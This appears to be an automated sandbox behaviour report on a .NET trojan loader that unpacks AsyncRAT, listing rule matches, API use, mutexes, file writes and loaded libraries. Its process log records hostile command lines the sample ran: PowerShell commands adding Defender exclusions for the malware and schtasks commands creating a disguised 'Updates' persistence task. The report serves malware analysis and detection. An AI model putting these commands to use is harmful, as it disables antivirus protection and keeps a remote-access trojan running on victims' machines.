Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000000.00000002.2201111262.0000000003643000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCAA.dll4 vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamexraw.exe4 vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000000.00000002.2208561504.0000000006D50000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUnIuy.exe" vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000000.00000000.2153793589.00000000001C2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameUnIuy.exe" vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000000.00000002.2209442377.0000000007060000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCAA.dll4 vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000009.00000002.4628623821.00000000011F7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000009.00000002.4639187944.0000000005E09000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000009.00000002.4637476925.0000000003F71000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUnIuy.exe" vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Binary or memory string: OriginalFilenameUnIuy.exe" vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.2.xNgpESfQOvfb.exe.2d8f19c.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.2.xNgpESfQOvfb.exe.2d99478.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 15.2.xNgpESfQOvfb.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.2.xNgpESfQOvfb.exe.2d99478.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.2.xNgpESfQOvfb.exe.2d51004.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.2.xNgpESfQOvfb.exe.2d8f19c.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000F.00000002.2297610217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: xNgpESfQOvfb.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, lNjw1JhxSV5n0cCMNW.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, lNjw1JhxSV5n0cCMNW.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.7060000.6.raw.unpack, lNjw1JhxSV5n0cCMNW.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.7060000.6.raw.unpack, lNjw1JhxSV5n0cCMNW.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, HE2n9dW4U1DsdVPZZK.cs | Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, HE2n9dW4U1DsdVPZZK.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, HE2n9dW4U1DsdVPZZK.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, coAw41HW9K74cRgqAt.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@21/18@1/1
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | File created: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3816:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2136:120:WilError_03
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1924:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5792:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Mutant created: \Sessions\1\BaseNamedObjects\Gt5MojO5rBrt6ybL
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | File created: C:\Users\user\AppData\Local\Temp\tmpA395.tmp
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | ReversingLabs: Detection: 31%
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | File read: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmp9832.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Process created: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Process created: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp"
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmp9832.tmp"
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Process created: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Process created: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
